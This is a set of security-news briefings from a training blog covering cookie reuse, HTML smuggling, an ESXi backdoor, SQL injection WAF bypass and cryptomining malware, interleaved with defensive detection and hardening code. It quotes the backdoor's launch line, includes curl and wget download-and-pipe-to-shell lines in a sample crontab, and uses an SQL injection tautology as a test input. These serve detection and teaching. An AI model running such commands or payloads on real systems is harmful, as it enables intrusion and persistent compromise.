Les Bell and Associates Pty Ltd
Blog entries about Les Bell and Associates Pty Ltd
Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.
News Stories
Atlassian Products Not Rotating Session Cookies
Just over a week ago, Bangalore-based threat intelligence firm CloudSEK discovered a breach of their systems which led to a small leak of some customer information. At first, their investigations suggested that an employee's Jira password was compromised in order to gain access to Confluence pages. But upon deeper investigation, the details are a bit more concerning.
In fact, the threat actor did gain access to a CloudSEK employee's Jira account, but this was done using Jira session cookies present in stealer logs being sold on the dark web. Further investigation revealed that the session cookies of Atlassian products such as Jira, Confluence and BitBucket are not invalidated when the password is changed, even with 2FA enabled, and remain valid for 30 days. They only expire at the end of that period, or if the user logs out before then. A password change - or other significant changes - should see session cookies rotated, with a new cookie being issued.
The CloudSEK researchers have confirmed that this flaw can take over Jira accounts at hundreds of companies: over a million compromised computers and over 16,000 Jira cookies are currently for sale on dark web marketplaces. The company has released a free tool which lets companies check to see if their accounts are being advertised on dark web marketplaces; they have also notified Atlassian, who have acknowledged the issue and are working to resolve it.
Kulshrestha, Sparsh and Mayank Satnalika, Security Flaw in Atlassian Products (Jira, Confluence,Trello, BitBucket) Affecting Multiple Companies, blog post, 13 December 2022. Available online at https://cloudsek.com/security-flaw-in-atlassian-products-jira-confluencetrello-bitbucket-affecting-multiple-companies/.
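The rotation the story calls for is simple to implement server-side. The following is an added illustration, not CloudSEK's tool or Atlassian's code: each user record carries a credential-generation counter, every issued session records the generation current at login, and a password change bumps the counter so that every earlier cookie fails validation without the server having to track them down. The 30-day lifetime is taken from the story; the in-memory store, PBKDF2 hashing and injectable clock are assumptions made to keep the example self-contained.

```python
import hashlib
import hmac
import os
import secrets
import time
from typing import Optional

SESSION_LIFETIME = 30 * 24 * 3600  # seconds; the 30-day cookie lifetime described above


def _hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2 keeps the example dependency-free; any modern password hash would do.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


class SessionStore:
    """In-memory users and sessions. A cookie is valid only while the generation
    it was issued under matches the user's current generation, so a password
    change stales every cookie issued before it (the 'rotation' in the story)."""

    def __init__(self, clock=time.time):
        self._clock = clock      # injectable for testing expiry
        self._users = {}         # username -> {"salt", "hash", "generation"}
        self._sessions = {}      # cookie value -> {"user", "generation", "expires"}

    def create_user(self, username: str, password: str) -> None:
        salt = os.urandom(16)
        self._users[username] = {"salt": salt, "hash": _hash_password(password, salt), "generation": 0}

    def _check(self, username: str, password: str) -> bool:
        user = self._users.get(username)
        return user is not None and hmac.compare_digest(user["hash"], _hash_password(password, user["salt"]))

    def login(self, username: str, password: str) -> Optional[str]:
        if not self._check(username, password):
            return None
        cookie = secrets.token_urlsafe(32)
        self._sessions[cookie] = {
            "user": username,
            "generation": self._users[username]["generation"],
            "expires": self._clock() + SESSION_LIFETIME,
        }
        return cookie

    def validate(self, cookie: str) -> Optional[str]:
        sess = self._sessions.get(cookie)
        if sess is None:
            return None
        user = self._users[sess["user"]]
        if self._clock() >= sess["expires"] or sess["generation"] != user["generation"]:
            self._sessions.pop(cookie, None)  # lazily purge a dead session
            return None
        return sess["user"]

    def change_password(self, username: str, old: str, new: str) -> bool:
        if not self._check(username, old):
            return False
        user = self._users[username]
        user["salt"] = os.urandom(16)
        user["hash"] = _hash_password(new, user["salt"])
        user["generation"] += 1  # every cookie issued under the old generation is now invalid
        return True

    def logout(self, cookie: str) -> None:
        self._sessions.pop(cookie, None)


if __name__ == "__main__":
    store = SessionStore()
    store.create_user("alice", "correct horse")
    cookie = store.login("alice", "correct horse")
    print("before change:", store.validate(cookie))
    store.change_password("alice", "correct horse", "battery staple")
    print("after change:", store.validate(cookie))
```

The same counter can be bumped on any other 'significant change' (2FA enrolment, e-mail change, a user-initiated 'sign out everywhere'), which is why a generation number is preferable to deleting sessions one by one.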
Qakbot Smuggles HTML in SVG Images
Your humble scribe fondly remembers the days of 7-bit ASCII email, before the evils of HTML formatting and massive MIME attachments. In particular, the shift to using highly-capable web browsers as email clients (rather than dumb text-only MUAs) opens up a world of possibilities for malicious users, who now have access to sophisticated scripting capabilities, cross-site scripting and other vectors.
However, crude embedding of malicious JavaScript code can easily be detected by network gateways and other security devices, so attackers have developed HTML smuggling techniques, which obfuscate or encode their payloads to evade detection. Cisco Talos researchers recently found a new technique used by the Qakbot banking trojan/stealer, which involves a particularly convoluted unpacking chain to infect the victim's computer.
The malicious email carries an HTML attachment, which in turn contains an SVG (Scalable Vector Graphics) image. SVG images are defined in XML markup, which in this case contains embedded HTML <script> tags. These, in turn, contain JavaScript which carries a base64-encoded password-protected ZIP file, which the user is prompted to open with a supplied password. And if the victim falls for this, they will find it unzips to an ISO file which infects their machine.
Once the machine is infected, it will hijack an email thread and propagate itself to still more victims. This may be a long and convoluted process, but it works, and it works well to evade detection by security devices.
Katz, Adam and Jaeson Schultz, HTML smugglers turn to SVG images, blog post, 13 December 2022. Available online at https://blog.talosintelligence.com/html-smugglers-turn-to-svg-images/.
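The structure described above - a <script> element nested inside an <svg> element, carrying a long base64 string - is something a mail gateway can look for in HTML attachments without executing anything. The following detector is an added example, not Talos's code or any product's rule: it walks the attachment with the standard-library HTML parser, records every script that sits inside an SVG, and decodes any base64 run in the script body to measure it and check for a ZIP header. The 200-character threshold and the sample attachment are constructed for the example.

```python
import base64
import binascii
import re
from html.parser import HTMLParser
from typing import Dict, List

# A long run of base64 alphabet characters inside script text is the usual sign
# of a smuggled payload; 200 characters (~150 bytes) is a threshold chosen for this example.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")
ZIP_MAGIC = b"PK\x03\x04"


class SvgScriptFinder(HTMLParser):
    """Records every <script> element nested inside an <svg> element and
    measures any base64 blobs found in its text."""

    def __init__(self):
        super().__init__()
        self.svg_depth = 0
        self.in_svg_script = False
        self.findings: List[Dict] = []

    def handle_starttag(self, tag, attrs):
        if tag == "svg":
            self.svg_depth += 1
        elif tag == "script" and self.svg_depth > 0:
            self.in_svg_script = True
            self.findings.append({"kind": "script_in_svg", "payload_bytes": 0, "zip_signature": False})

    def handle_endtag(self, tag):
        if tag == "svg" and self.svg_depth > 0:
            self.svg_depth -= 1
        elif tag == "script":
            self.in_svg_script = False

    def handle_data(self, data):
        # HTMLParser delivers <script> bodies here verbatim (CDATA mode).
        if not self.in_svg_script:
            return
        current = self.findings[-1]
        for match in B64_RUN.finditer(data):
            try:
                blob = base64.b64decode(match.group(0), validate=True)
            except binascii.Error:
                continue  # long identifier or otherwise not well-formed base64
            current["payload_bytes"] += len(blob)
            if blob.startswith(ZIP_MAGIC):
                current["zip_signature"] = True


def scan_html_attachment(html: str) -> List[Dict]:
    """Return one finding per <script> found inside an <svg> in the attachment."""
    parser = SvgScriptFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: an HTML attachment whose inline SVG carries a script holding
# a base64 string that decodes to a ZIP header followed by 300 zero bytes.
_FAKE_ZIP = ZIP_MAGIC + bytes(300)
SAMPLE_SMUGGLED = (
    "<html><body><p>Please see the attached document.</p>"
    "<svg xmlns='http://www.w3.org/2000/svg' width='1' height='1'>"
    "<script>var payload = \"" + base64.b64encode(_FAKE_ZIP).decode() + "\";</script>"
    "</svg></body></html>"
)
SAMPLE_BENIGN = "<html><body><svg width='10' height='10'><circle r='4'/></svg></body></html>"

if __name__ == "__main__":
    for name, doc in (("smuggled", SAMPLE_SMUGGLED), ("benign", SAMPLE_BENIGN)):
        print(name, scan_html_attachment(doc))
```

A script inside an SVG is unusual enough in legitimate mail that the nesting alone is worth a flag; the decoded size and ZIP signature simply raise the confidence.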
FBI Takes Down 48 DDoS Sites, DoJ Charges Six Defendants
The FBI is now in the process of seizing 48 internet domains associated with web sites offering DDoS-for-hire services, commonly called "booter" services. The web sites had been used to launch millions of attempted - some successful - distributed denial of service attacks worldwide, targeting educational institutions, government agencies, gaming platforms and millions of individual users, disrupting their services and internet connections.
Although the sites claimed to offer "stresser" services, purportedly used for performance-testing networks and servers, the FBI determined that this was simply pretence, and that "thousands of communications between booter site administrators and their customers . . . make clear that both parties are aware that the customer is not attempting to attack their own computers", according to an affidavit filed in support of court-authorised warrants to seize the sites.
At the same time, prosecutors in both Los Angeles and Alaska filed charges against six defendants across the US, who each allegedly offered one-stop DDoS services, with subscriptions of various lengths and attack volumes. In each case, the FBI posed as a customer and was able to conduct test attacks to confirm that the "booter" site functions as advertised.
The FBI, in conjunction with the UK National Crime Agency and the Netherlands Police, has launched a campaign using ads placed in search engines, triggered by the keywords associated with DDoS activities - the idea being to deter naive would-be-criminals searching for DDoS services and educate the public on their illegality.
Mrozek, Thom, Federal Prosecutors in Los Angeles and Alaska Charge 6 Defendants with Operating Websites that Offered Computer Attack Services, news release, 14 December 2022. Available online at https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites.
These news brief blog articles are collected at https://www.lesbell.com.au/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.
Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License and is labeled TLP:CLEAR.
News Stories
TPG Exchange Servers Breached
Australian telco TPG Telecom has notified the Australian Stock Exchange (ASX) that their security consultants, Mandiant, had found evidence of unauthorised access to a hosted Microsoft Exchange service which hosts email accounts for up to 15,000 business customers of their iiNet and Westnet brands. The announcement gave no indication of the timeframe of the breach - only that it was discovered on 13 December as part of "Mandiant's ongoing engagement to assist with cyber protection" during which they conducted a "forensic historical review and discovered the unauthorised access".
The analysis revealed that the primary purpose of the threat actor was to search for customers' cryptocurrency and financial information. The unauthorised access has been blocked, additional controls put in place, and all affected customers are being contacted.
2022 has been a bad year for Microsoft Exchange users; one wonders why they keep using it. . .
Rickards, James, Unauthorised access to Hosted Exchange service, market announcement, 14 December 2022. Available online at https://www.asx.com.au/asx/statistics/displayAnnouncement.do?display=pdf&idsId=02612242.
Australia Considers Sanctions on Medibank Hackers
Having introduced Magnitsky Act-like laws to permit international sanctions, the Australian Government is now considering using them against cybercriminals for the first time. The government has previously sanctioned Iran's 'morality police' as well as Iranians and Russians linked to human rights abuses.
The Department of Foreign Affairs and Trade has provided advice to the Minister, Penny Wong, about possible use of these cyber-related powers. In a response tabled to a Senate question on notice, the Department stated, "The department routinely provides advice to ministers on possible sanctions measures, including cyber sanctions".
Hurst, Daniel, Russian Medibank hackers could be first targets of Australian sanctions against cyber-attackers, The Guardian, 15 December 2022. Available online at https://www.theguardian.com/australia-news/2022/dec/15/russian-medibank-hackers-could-be-first-targets-of-australian-sanctions-against-cyber-attackers.
InfraGard Member List Compromised via Social Engineering
The FBI runs a threat information sharing network called InfraGard which has more than 80,000 members, who are supposed to be vetted individuals in security roles - both physical and cyber - at private sector critical infrastructure companies. Now the InfraGard portal and membership database has been breached by a simple, but audacious, social engineering attack.
Security blogger Brian Krebs reports that a thread offering the InfraGard database for sale was posted to a relatively new cybercrime forum called 'Breached'. The database contains the names and contact information for tens of thousands of InfraGard members. The seller is using the handle 'USDoD', with the Defense Department's seal as their avatar, and is asking for $US50,000 - perhaps a bit optimistically, considering much of the information is already publicly available.
The breach was accomplished by submitting a phony membership application using the name, Social Security Number, date of birth and other personal details of a finance corporation CEO. InfraGard requires identity verification by either email or telephone - and while the attacker controlled a suitable email address, they chanced using the CEO's genuine mobile phone number. They got lucky: a month later they received an email stating that their application had been approved.
From there, the attacker had a friend write a Python script to query an API on the InfraGard website, and the data was theirs. As Krebs wrote his article, USDoD still had access to the InfraGard site and was using it to message members.
Krebs, Brian, FBI’s Vetted Info Sharing Network ‘InfraGard’ Hacked, blog post, 13 December 2022. Available online at https://krebsonsecurity.com/2022/12/fbis-vetted-info-sharing-network-infragard-hacked/.
FortiOS 0day Exploited In The Wild
Fortinet has been having a bad year, and this continues as the company has issued an advisory for a heap-based buffer overflow in the SSL VPN component of their FortiOS software. The vulnerability will allow a remote unauthenticated attacker to execute arbitrary code or commands via specially-crafted requests.
The advisory provides multiple IOCs which customers should immediately check for; the recommended workaround is to disable the SSL VPN service. The permanent fix is, of course, to upgrade to a later version of FortiOS.
Fortinet PSIRT, FortiOS - heap-based buffer overflow in sslvpnd, PSIRT advisory, 12 December 2022. Available online at https://www.fortiguard.com/psirt/FG-IR-22-398.
Citrix ADC and Gateway Exploits In The Wild
Citrix has released builds to fix a critical vulnerability, CVE-2022-27518, which affects Citrix ADC and Citrix Gateway versions 12.1 and 13.0 which are configured with a SAML SP or IdP configuration. Version 13.0-58.32 is not affected. This vulnerability is being exploited in the wild and customers are urged to update as soon as possible or take other measures to mitigate the problem.
CVE-2022-27518 is an "improper control of a resource through its lifetime" vulnerability - probably a memory problem such as use-after-free or similar - which allows an unauthenticated attacker remote code execution.
The National Security Agency has also issued a guidance document with advice on threat hunting steps Citrix customers can take to look for artifacts on their devices which may be attributed to APT5, also known as Keyhole Panda, UNC2630 and MANGANESE.
Lefkowitz, Peter, Critical security update now available for Citrix ADC, Citrix Gateway, blog post, 13 December 2022. Available online at https://www.citrix.com/blogs/2022/12/13/critical-security-update-now-available-for-citrix-adc-citrix-gateway/.
National Security Agency, APT5: Citrix ADC Threat Hunting Guidance, guidance document, 13 December 2022. Available online at https://media.defense.gov/2022/Dec/13/2003131586/-1/-1/0/CSA-APT5-CITRIXADC-V1.PDF.
News Stories
Python Backdoor Gives Access to VMware ESXi Servers
VMware's ESXi is a popular virtualization platform with a lightweight UNIX-like host OS; it loads a near-fresh root filesystem into RAM on reboot, with only a very few files being preserved through the reboot process. One of these is the /etc/rc.local/local.sh file, which allows customization of the startup process, although it is normally empty other than for a few comments explaining its purpose.
In October, Juniper Threat Labs researchers discovered a backdoor implanted into an ESXi server; the attacker had added 8 lines of code in /etc/rc.local/local.sh, which in turn added a single line of code to another startup file, /bin/hostd-probe.sh and then reset the mtime and atime on the modified file to that of the original, in order to evade detection. That single line of code launches a Python program:
/bin/nohup /bin/python -u /store/packages/vmtools.py >/dev/null 2>&1&
Being Python code, that program could run on any POSIX-style platform, but there are indications it is ESXi-specific: the filename is a giveaway, as is a VMware copyright statement at the top of the code, both intended to distract anyone investigating. When run, the code launches a simple web server which will accept password-protected POST requests to either run arbitrary commands and display the result as a web page, or to launch a reverse shell to the attacker's netcat listener. Curiously, this web server binds to localhost:8008, and so the attackers also reconfigure the ESXi reverse HTTP proxy in order to redirect requests to their server.
The initial compromise which allowed installation of the backdoor could not be determined, but the default port number for the reverse shell is 427 which, perhaps not coincidentally, is also the port for OpenSLP, the implementation of the Service Location Protocol used on ESXi, and this is quite probably the service which was exploited to gain access.
The Juniper blog post provides suggested mitigations and pointers to likely IOCs.
Langton, Asher, A Custom Python Backdoor for VMWare ESXi Servers, blog post, 9 December 2022. Available online at https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers.
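Two details in the story suggest a cheap audit an ESXi administrator can run: /etc/rc.local/local.sh should contain nothing but comments (and its closing 'exit 0'), and while 'touch -r' can copy mtime and atime from another file, the inode change time (ctime) is set by the kernel and cannot be back-dated from userland, so a ctime far newer than the mtime is itself a tell. The script below is an added example, not Juniper's tooling: it reports non-comment lines, lines containing indicator strings taken from the story above, and the ctime/mtime gap. The 'exit 0' allowance, the 60-second tolerance and the two sample files it builds in a temporary directory are constructed for the example; on a real host you would point it at the live file.

```python
import os
import tempfile
import time
from typing import Dict

# Lines a stock local.sh may legitimately contain besides comments and blanks
# (assumption for this example: the file's closing 'exit 0').
ALLOWED_LINES = {"exit 0"}

# Substrings taken from the Juniper write-up described above.
INDICATORS = ("/bin/hostd-probe.sh", "/store/packages/", "touch -r", "nohup")


def audit_startup_script(path: str, clock_skew_tolerance: float = 60.0) -> Dict:
    """Report unexpected content and a timestamp consistency check for a startup script.
    On POSIX systems utime()/'touch -r' rewrite atime and mtime but bump ctime to 'now',
    so a large positive ctime - mtime gap means the visible timestamps were reset."""
    st = os.stat(path)
    with open(path, encoding="utf-8", errors="replace") as fh:
        lines = [ln.rstrip("\n") for ln in fh]
    unexpected = [
        ln for ln in lines
        if ln.strip() and not ln.lstrip().startswith("#") and ln.strip() not in ALLOWED_LINES
    ]
    indicator_lines = [ln for ln in lines if any(ind in ln for ind in INDICATORS)]
    gap = st.st_ctime - st.st_mtime
    return {
        "unexpected_lines": unexpected,
        "indicator_lines": indicator_lines,
        "ctime_minus_mtime": gap,
        "timestamps_inconsistent": gap > clock_skew_tolerance,
    }


def build_samples(directory: str) -> Dict[str, str]:
    """Write a stock-looking local.sh and a tampered copy whose mtime/atime were
    back-dated the way the implant did. Constructed sample data, not real files."""
    stock = "#!/bin/sh\n# local configuration options\n# modify at your own risk\nexit 0\n"
    implant = (
        "# EXAMPLE ONLY: constructed stand-in for an injected startup line\n"
        "/bin/sh /store/packages/example-implant.sh >/dev/null 2>&1 &\n"
    )
    clean = os.path.join(directory, "local.sh.clean")
    tampered = os.path.join(directory, "local.sh.tampered")
    with open(clean, "w") as fh:
        fh.write(stock)
    with open(tampered, "w") as fh:
        fh.write(implant + stock)
    a_year_ago = time.time() - 365 * 86400
    os.utime(tampered, (a_year_ago, a_year_ago))  # what 'touch -r <original>' achieves
    return {"clean": clean, "tampered": tampered}


def run_demo() -> Dict[str, Dict]:
    """Build both samples in a temporary directory and audit them."""
    with tempfile.TemporaryDirectory() as tmp:
        return {name: audit_startup_script(p) for name, p in build_samples(tmp).items()}


if __name__ == "__main__":
    for name, report in run_demo().items():
        print(name, report)
```

The same ctime comparison applies to /bin/hostd-probe.sh, the file the implant actually modified, and to any other preserved file on the host.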
Chrome Adds Passkey Support
Google has announced that passkey support is now available in Chrome Stable M108, for the Windows 11, macOS and Android platforms. The Android implementation will sync passkeys securely via the Google Password Manager (or, in upcoming versions of Android, any other password manager that supports passkeys).
Passkeys are intended to replace the use of passwords, with all their problems and vulnerabilities, with the use of public-key authentication - passkeys are far more secure, are not leaked in server breaches, and cannot be phished. However, they require web sites and applications to support the W3C WebAuthn API, which is rapidly being deployed on popular sites.
A passkey saved on a device will automatically show up in autofill when the user signs in to a site, and on a desktop device the user can also use a passkey from a nearby mobile device; the browser will relay the authentication traffic between the remote server and the mobile device. In all cases, the private key component of the passkey never leaves the mobile device (rather like the way SSH supports agent forwarding).
Sarraf, Ali, Introducing passkeys in Chrome, Chromium blog, 8 December 2022. Available online at https://blog.chromium.org/2022/12/introducing-passkeys-in-chrome.html.
French Retailer Intersport DOS'ed by Hive Ransomware
Black Friday sales at the French stores of sports retail giant Intersport were badly disrupted when cash registers were shut down and loyalty card and gift card services were also unavailable. Store staff were forced to keep paper records and perform checkouts manually, causing delays.
The cause was a ransomware attack on 23 November, for which credit has been claimed by the Hive ransomware-as-a-service group on its leak website; just why the Hive group has done so is unclear: it might be to encourage Intersport to negotiate the ransom. Intersport would not elaborate, but says it does not believe customer data had been accessed.
Cluley, Graham, Hive ransomware gang claims responsibility for attack on Intersport that left cash registers disabled, blog post, 13 December 2022. Available online at https://www.bitdefender.com/blog/hotforsecurity/hive-ransomware-gang-claims-responsibility-for-attack-on-intersport-that-left-cash-registers-disabled/.
Botnet Brute-Forces WordPress Sites
FortiGuard Labs has provided an analysis of a newly-discovered botnet which is scanning for and then brute-forcing self-hosted WordPress CMS sites. Once the botnet has managed to chance upon credentials which give it access to a site, it then infects the site with a copy of itself and then contacts its C2 server.
GoTrim is written in the Go programming language, and takes advantage of that language's concurrent programming features to perform multiple tasks simultaneously. It is also statically linked, so that when it erases itself, no trace is left behind - although this means that it also does not persist on the victim system. It checks to see if the site is hosted on wordpress.com, and if so it moves on, preferring to focus on self-hosted sites which are generally less well defended.
The backdoor can operate in two modes - client mode, in which it sends HTTP POST requests to its C2 server, or server mode, in which it listens for POST requests. It can also detect other CMSs, as well as the open-source e-commerce merchant server, OpenCart.
FortiGuard Labs, GoTrim: Go-based Botnet Actively Brute Forces WordPress Websites, blog post, 12 November 2022. Available online at https://www.fortinet.com/blog/threat-research/gotrim-go-based-botnet-actively-brute-forces-wordpress-websites.
News Stories
JSON Allows SQL Injection to Bypass Web Application Firewalls
Claroty's Team82 has developed a generic technique which allowed them to bypass web application firewalls while delivering SQL injection payloads.
SQL injection remains one of the leading vulnerabilities in web applications, in large part due to the constant demand for web developers who, without proper security education, copy code fragments from sites like Stack Overflow without realising that the code fragments are just that - fragments intended to demonstrate a technique, and not fully-formed code ready to be copied and pasted into your finished application code (a 2018 study suggested that roughly 50% of answers to PHP questions contain SQL injection vulnerabilities).
The correct fix, of course, is to educate developers, but in the meantime most users depend on web application firewalls, which can detect and block a range of attacks on web applications. However, the technique developed by Team82 works by prepending JSON syntax to the SQL injection payloads - and because many WAFs lack JSON support (even though databases added JSON support many years ago) this threw the parser component of the WAF for a loop, allowing the SQL injection to pass.
The technique worked on all but one WAF the researchers tested, and after they notified the vendors, their products have had JSON support added. The Team82 researchers also added support for the technique to the popular SQLMap open-source exploitation tool, for use by penetration testers.
Moshe, Noam, {JS-ON: Security-OFF}: Abusing JSON-Based SQL to Bypass WAF, blog post, 8 December 2022. Available online at https://claroty.com/team82/research/js-on-security-off-abusing-json-based-sql-to-bypass-waf.
Laurent22, Potential SQL injections vulnerabilities in Stack Overflow PHP questions, automated analysis report, July 2018. Available online at https://laurent22.github.io/so-injections/.
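The bypass matters only because the application behind the WAF builds SQL by string concatenation in the first place. As an added illustration of the developer-side fix the article calls for (not Team82's code, and not reproducing their JSON bypass), the following places the Stack-Overflow-fragment pattern beside a parameterised query against an in-memory SQLite table of constructed customer records. The parameterised form hands the value to the database separately from the SQL text, so nothing in the value - JSON syntax included - is ever parsed as SQL, and no gateway has to recognise it.

```python
import sqlite3
from typing import List, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample table of customer records, kept in memory."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO customers (name, email) VALUES (?, ?)",
        [("alice", "alice@example.com"), ("bob", "bob@example.com"), ("carol", "carol@example.com")],
    )
    return conn


def lookup_unsafe(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    # The copied-fragment pattern: the request parameter is pasted into the SQL text,
    # so a quote in the value ends the string literal and the rest becomes SQL.
    query = f"SELECT name, email FROM customers WHERE name = '{name}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> List[Tuple]:
    # Parameterised query: the value is bound by the driver and never tokenised
    # as SQL, whatever syntax it happens to contain.
    return conn.execute("SELECT name, email FROM customers WHERE name = ?", (name,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    probe = "' OR '1'='1"  # the textbook tautology, used here only to show the difference
    print("unsafe, normal input:", lookup_unsafe(db, "alice"))
    print("unsafe, tautology:   ", lookup_unsafe(db, probe))
    print("safe, normal input:  ", lookup_safe(db, "alice"))
    print("safe, tautology:     ", lookup_safe(db, probe))
```

The unsafe version returns every row for the tautology input; the safe version looks for a customer literally named "' OR '1'='1" and finds none. A WAF sitting in front of the unsafe version is guessing at what the database parser will do, which is exactly the gap the JSON trick exploits.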
New Waves of Truebot Attacks
Cisco Talos security researchers are reporting an increase in infections by Truebot (also known as Silence.Downloader). Previously, Truebot has been spread via malmails and mainly infected desktop/laptop systems inside corporate networks. The new wave is using two new initial infection mechanisms.
In August, the researchers noticed a small number of cases in which Truebot was run following the exploitation of a vulnerability in the IT asset management product Netwrix Auditor. Since this tool is not widely used on Internet-facing systems, this remained a limited infection. However, in October a second wave of infection started, this time delivered via Raspberry Robin malware, which usually spreads via USB drives. Between them, these two infections have assembled a botnet of over 1,000 systems worldwide, with a particular focus on Mexico, Brazil and Pakistan. Since November, the attackers have switched to an as-yet-unknown delivery mechanism which has infected over 500 Internet-facing Windows servers in the US, Canada and Brazil.
Post-compromise, the current versions of Truebot download either Cobalt Strike reverse shell or Grace malware payloads, typically followed by a custom 'Teleport' exfiltration tool. However, in some cases, the threat actors go on to deploy Clop ransomware as part of a double extortion attack.
These campaigns seem to involve two different groups: Silence Group, who are originally responsible for Truebot, and TA505, a.k.a. Evil Corp, who are associated with the Grace malware.
Pereira, Tiago, Breaking the silence - Recent Truebot activity, threat advisory, 8 December 2022. Available online at https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/.
Linux Servers Targeted for Cryptomining and More With Chaos RAT
For some time, cryptojacking threat groups have been targeting Linux instances in the cloud, generally using the same sequence of actions after gaining initial access: kill off any competing malware and security products, establish persistence and then execute a Monero cryptominer. But in November Trend Micro researchers observed a new pattern of activity: in this case, a remote access trojan called Chaos (Trojan.Linux.CHAOSRAT) is installed along with the XMRig miner.
The infection ensures persistence by setting up a cron job which will keep downloading and reinstalling itself from Pastebin every 10 minutes, and also installs itself in different locations to further evade removal. The other payload download C2 server is hosted in Russia, but once the Chaos RAT is installed, it connects to a C2 server which appears to be in Hong Kong, reporting detailed configuration of the infected machine.
The RAT is written in Go and has quite comprehensive capabilities: it can provide a reverse shell, upload, download and delete files, take screenshots, restart or shut down the computer. This suggests that this threat actor is considering broadening their activities from just cloud-based cryptomining.
Fiser, David and Alfredo Oliveira, Linux Cryptocurrency Mining Attacks Enhanced via CHAOS RAT, blog post, 12 December 2022. Available online at https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html.
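The persistence described above - a cron job that re-fetches the malware from a paste site every ten minutes - leaves a pattern in the crontab that is easy to hunt for across a fleet. The following is an added example, not Trend Micro's detection content: it parses crontab text, works out the re-run interval from the minute field, and flags commands that download and pipe to a shell or fetch from a paste site, noting when the interval is short. The sample crontab, the 15-minute threshold and the host list are constructed for the example.

```python
import re
from typing import Dict, List, Optional

DOWNLOADERS = ("curl", "wget")
PASTE_HOSTS = ("pastebin.com",)  # extend with other paste services as required
SHELL_PIPE = re.compile(r"\|\s*(?:/bin/)?(?:ba)?sh\b")


def minute_interval(minute_field: str) -> int:
    """Rough re-run period in minutes implied by the minute field: '*' is every
    minute, '*/N' every N minutes, anything else hourly or slower."""
    if minute_field == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", minute_field)
    return int(m.group(1)) if m else 60


def analyse_crontab(text: str, max_interval: int = 15) -> List[Dict]:
    """Return one finding per crontab entry that downloads-and-executes or
    pulls from a paste site, with the re-run interval when it is known."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blanks, comments and VAR=value lines
        parts = line.split(None, 5)
        interval: Optional[int]
        if parts[0].startswith("@"):  # @reboot, @hourly and friends
            if len(parts) < 2:
                continue
            interval, command = None, line.split(None, 1)[1]
        elif len(parts) >= 6:
            interval, command = minute_interval(parts[0]), parts[5]
        else:
            continue
        reasons = []
        if any(tool in command for tool in DOWNLOADERS) and SHELL_PIPE.search(command):
            reasons.append("downloads and pipes to a shell")
        if any(host in command for host in PASTE_HOSTS):
            reasons.append("fetches from a paste site")
        if reasons and interval is not None and interval <= max_interval:
            reasons.append(f"re-runs every {interval} min")
        if reasons:
            findings.append({"line": lineno, "interval_min": interval, "command": command, "reasons": reasons})
    return findings


# Constructed sample crontab; the URLs and address are placeholders, not real indicators.
SAMPLE_CRONTAB = """\
# constructed sample crontab for this example
MAILTO=root
0 3 * * * /usr/bin/apt-get -y update
*/10 * * * * curl -fsSL https://pastebin.com/raw/EXAMPLE-ID | sh
*/5 * * * * wget -q -O - http://198.51.100.7/x.sh | /bin/sh
30 * * * * /usr/local/bin/backup.sh
"""

if __name__ == "__main__":
    for finding in analyse_crontab(SAMPLE_CRONTAB):
        print(finding)
```

Run it over the output of 'crontab -l' for every account plus the files under /etc/cron.d; the story also notes the RAT installs copies in several locations, so a hit on one line is a prompt to look for the others rather than just delete the entry.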
UNSW Resets Qbits With Maxwell's Daemon
A story that slipped under our radar for a while: Every student who studies thermodynamics encounters Maxwell's Daemon, a thought-experiment daemon which, by opening a door between two chambers when a highly-excited particle approaches it and closing the door to slow ones, can create a temperature difference between the two, thereby driving a heat engine and achieving - in theory - perpetual motion. Such a daemon is impossible, of course - the daemon itself needs to consume energy to observe the particles and move the door.
But in a modern twist on the idea, quantum computing engineers at University of New South Wales have achieved something similar, using a fast digital voltmeter to observe the temperature of electrons drawn from a warm pool of electrons. In doing so, they make the electron much cooler than the pool it came from, which corresponds to it being in the '0' state.
This is the basis of their new technique for resetting the state of electron spin silicon qubits. The old technique works by cooling electrons to a temperature near absolute zero, and hoping that all the electrons 'relax' to the '0' state, but this still leaves a 20% probability that the electron will be a '1'. The new technique reduces the probability of error to 1% - a major step in improving the reliability of quantum computers.
UNSW Media, New quantum computing feat is a modern twist on a 150-year-old thought experiment, news release, 30 November 2022. Available online at https://newsroom.unsw.edu.au/news/science-tech/new-quantum-computing-feat-modern-twist-150-year-old-thought-experiment.
News Stories
Ethics of Reporting on Privacy Breaches
An interesting article on the ABC (Australia) web site examines the ethical issues faced by reporters in covering privacy breaches such as the recent Medibank breach. It's a topic I explore in a cybersecurity management course I teach, via a case study in which a hotel chain suffers a cryptominer infection via its guest wifi network. A relatively minor incident causes major reputational damage as security bloggers publicize it (coupled with inept crisis communications by the hotel chain's PR person), and I get students to discuss the allocation of responsibility, accountability and liability among the hotel IT staff, the hackers, the bloggers and the hotel guests themselves (after all, do you trust public wifi networks? I don't).
